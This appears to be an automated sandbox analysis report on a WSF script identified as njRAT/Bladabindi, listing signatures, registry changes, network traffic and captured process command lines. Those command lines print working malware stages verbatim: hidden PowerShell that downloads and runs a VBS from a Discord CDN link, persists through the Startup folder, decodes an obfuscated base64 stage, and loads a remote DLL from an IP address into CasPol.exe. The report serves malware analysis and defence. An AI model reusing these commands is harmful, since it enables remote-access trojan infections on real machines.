Analysis Overview
SHA256
ce6cdc61e1758c5abd949a017475171aea3dbd9571d45300990badd6006759c4
Threat Level: Known bad
The file e4fbe2c0de215885d004f354f1e57357 was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Blocklisted process makes network request
Drops startup file
Deletes itself
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-22 18:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-22 18:00
Reported
2022-09-22 18:03
Platform
win7-20220901-en
Max time kernel
107s
Max time network
49s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico | C:\Windows\explorer.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 200000001a00eebbfe2300001000d09ad3fd8f23af46adb46c85480369c700000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1368 wrote to memory of 900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1368 wrote to memory of 900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1368 wrote to memory of 900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 900 wrote to memory of 860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
| PID 900 wrote to memory of 860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
| PID 900 wrote to memory of 860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\explorer.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Network
Files
memory/1368-54-0x000007FEFB641000-0x000007FEFB643000-memory.dmp
memory/900-55-0x0000000000000000-mapping.dmp
memory/900-57-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp
memory/900-59-0x0000000002344000-0x0000000002347000-memory.dmp
memory/900-58-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp
memory/900-60-0x000000001B770000-0x000000001BA6F000-memory.dmp
memory/860-61-0x0000000000000000-mapping.dmp
memory/900-63-0x000000000234B000-0x000000000236A000-memory.dmp
memory/1200-65-0x00000000039C0000-0x00000000039D0000-memory.dmp
memory/900-66-0x0000000002344000-0x0000000002347000-memory.dmp
memory/900-67-0x000000000234B000-0x000000000236A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-22 18:00
Reported
2022-09-22 18:03
Platform
win10v2004-20220812-en
Max time kernel
104s
Max time network
151s
Command Line
Signatures
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1224 set thread context of 1344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('凸凸凸','U') ) );$OWjuxDt = $OWjuxDt.replace('%NYgOxRUP%', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.120/dll/lannodll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.0008ko9012/8483493370688291201/1753507285667291201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'حتمذمیص' ))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| RU | 5.42.199.120:80 | 5.42.199.120 | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | wins2109ok.duckdns.org | udp |
| US | 173.225.115.227:8000 | wins2109ok.duckdns.org | tcp |
| US | 173.225.115.227:8000 | wins2109ok.duckdns.org | tcp |
Files
memory/1884-132-0x0000000000000000-mapping.dmp
memory/1884-133-0x00000221C4C10000-0x00000221C4C32000-memory.dmp
memory/1884-134-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp
memory/4640-135-0x0000000000000000-mapping.dmp
C:\Windows\Temp\nLeNPdi.vbs
| MD5 | a0fa641e1fe743aa44d0b42c25243143 |
| SHA1 | 5db55be1cbe8e19f55671e18ca2741e9a5d61c48 |
| SHA256 | 3e2e52d83f938c4bbe67d9369bb29866153ecc846aa7e9761e73dbfaa8a26041 |
| SHA512 | e3f103df2bdc9590e738141159da75d63b9e61e60c85df689986157339641761c2269dd29fdbdea8838eaeec8c2569320682501a2df019f08222c8489110de4d |
memory/2080-137-0x0000000000000000-mapping.dmp
memory/3760-138-0x0000000000000000-mapping.dmp
memory/3760-139-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp
memory/1224-140-0x0000000000000000-mapping.dmp
memory/1224-141-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp
memory/1344-142-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1344-143-0x000000000040676E-mapping.dmp
memory/1224-144-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/3760-147-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4aaea8e990963328115bd59dee2bcda8 |
| SHA1 | 2d7eed0a0a898811d6a149a4545ab3732477c01a |
| SHA256 | d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc |
| SHA512 | de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50 |
memory/1884-149-0x00007FFFE1870000-0x00007FFFE2331000-memory.dmp
memory/1344-150-0x0000000004A10000-0x0000000004AAC000-memory.dmp
memory/1344-151-0x0000000005060000-0x0000000005604000-memory.dmp
memory/1344-152-0x0000000004C60000-0x0000000004CF2000-memory.dmp
memory/1344-153-0x0000000004D40000-0x0000000004D4A000-memory.dmp
memory/1344-154-0x0000000004DD0000-0x0000000004E36000-memory.dmp
memory/2116-155-0x0000000000000000-mapping.dmp